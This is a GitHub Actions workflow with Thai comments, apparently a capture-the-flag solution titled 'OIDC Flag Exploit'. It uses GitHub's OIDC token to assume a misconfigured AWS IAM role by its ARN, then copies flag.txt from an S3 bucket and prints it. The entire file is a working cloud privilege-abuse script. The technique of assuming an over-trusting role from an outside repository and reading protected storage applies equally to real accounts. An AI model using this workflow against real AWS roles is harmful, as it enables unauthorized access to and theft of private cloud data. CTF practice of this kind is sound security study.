name: OIDC Flag Exploit

on:
  push:
  workflow_dispatch:

permissions:
  id-token: write # จำเป็นสำหรับการรับ OIDC Token
  contents: read

jobs:
  exploit:
    runs-on: ubuntu-latest

    steps:
    # ใช้ Role ARN จากโจทย์ และ Region
    - name: Configure AWS credentials via OIDC
      uses: aws-actions/configure-aws-credentials@v4
      with:
        role-to-assume: "arn:aws:iam::694502195928:role/admin-godmode-flag-reader-lol-698875" 
        role-session-name: GitHubActions-Pwn-${{ github.run_id }}
        aws-region: "ap-southeast-1"

    # ใช้สิทธิ์ที่ได้มาเพื่ออ่าน Flag จาก S3
    - name: Read flag from the secret storage and print it
      run: |
        aws s3 cp s3://oh-i-really-do-care/flag.txt flag.txt
        echo "--- FLAG ---"
        cat flag.txt 
        echo "------------"
      